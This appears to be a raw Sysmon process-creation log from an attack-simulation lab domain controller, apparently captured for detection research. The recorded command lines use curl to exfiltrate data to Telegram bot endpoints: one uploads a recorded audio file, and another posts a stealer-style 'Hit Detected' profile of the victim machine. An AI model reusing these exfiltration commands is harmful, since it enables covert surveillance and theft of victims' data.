154100x800000000000000049925Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-02-19 11:34:03.290{d7bc9b2f-c1ab-67b5-66bc-000000003903}1376C:\Windows\System32\curl.exe8.9.1The curl executableThe curl executablecurl, https://curl.se/curl.execurl -F "chat_id=111111" -F "audio=@"C:\Users\user\AppData\Local\Temp\AudioRecords\record_20250215_132432.wav"" "https://api.telegram.org/bot11113:AAFq4Uha11111111A8p1hB1DRE/sendAudio" C:\Users\Administrator\ATTACKRANGE\Administrator{d7bc9b2f-18f4-67ae-02d9-560000000000}0x56d9022HighMD5=6DF52ACFBF5F48630841F469D6691FB5,SHA256=8B39C07EC671DAFB125BDC0E5FD4D51BC4A7D73E505C63C95F976698BBBD5699,IMPHASH=5AB6BFAF3A98F68848DE5330AE012619{d7bc9b2f-c1ab-67b5-65bc-000000003903}5680C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "curl -F "chat_id=111111" -F "audio=@"C:\Users\user\AppData\Local\Temp\AudioRecords\record_20250215_132432.wav"" "https://api.telegram.org/bot11113:AAFq4Uha11111111A8p1hB1DRE/sendAudio" >nul 2>&1"ATTACKRANGE\Administrator 154100x800000000000000049924Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-02-19 11:34:03.255{d7bc9b2f-c1ab-67b5-65bc-000000003903}5680C:\Windows\System32\cmd.exe10.0.17763.1697 (WinBuild.160101.0800)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "curl -F "chat_id=111111" -F "audio=@"C:\Users\user\AppData\Local\Temp\AudioRecords\record_20250215_132432.wav"" "https://api.telegram.org/bot11113:AAFq4Uha11111111A8p1hB1DRE/sendAudio" >nul 2>&1"C:\Users\Administrator\ATTACKRANGE\Administrator{d7bc9b2f-18f4-67ae-02d9-560000000000}0x56d9022HighMD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18{d7bc9b2f-6c0d-67af-6a2c-000000003903}6468C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator 154100x800000000000000049913Microsoft-Windows-Sysmon/Operationalar-win-dc.attackrange.local-2025-02-19 11:33:27.070{d7bc9b2f-c187-67b5-5bbc-000000003903}2772C:\Windows\System32\curl.exe8.9.1The curl executableThe curl executablecurl, https://curl.se/curl.exeC:\Windows\System32\curl.exe curl -s -X POST "https://api.telegram.org/bot111:111AYe4d4_t111111OflVXET5GIEw/sendMessage" -d "chat_id=-11111111111" -d "text=<b>Hit Detected :)</b><b> ====[HIT INFO]====</b><b> [+] System =></b> Microsoft Windows 10 Pro <b> [+] RAM =></b> 7 GB<b> [+] Processor =></b> Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz <b> [+] Cores =></b> 4 <b> [+] IP =></b> 34.141.146.114<b> [+] Country =></b> NL<b> [+] User =></b> computer\user<b> [+] Telegram Installed =></b> <code>No</code><b> [+] Date =></b> Tue 02/18/2025 4:32:10.50" -d "parse_mode=HTML"C:\Users\Administrator\ATTACKRANGE\Administrator{d7bc9b2f-18f4-67ae-02d9-560000000000}0x56d9022HighMD5=6DF52ACFBF5F48630841F469D6691FB5,SHA256=8B39C07EC671DAFB125BDC0E5FD4D51BC4A7D73E505C63C95F976698BBBD5699,IMPHASH=5AB6BFAF3A98F68848DE5330AE012619{d7bc9b2f-6c0d-67af-6a2c-000000003903}6468C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" ATTACKRANGE\Administrator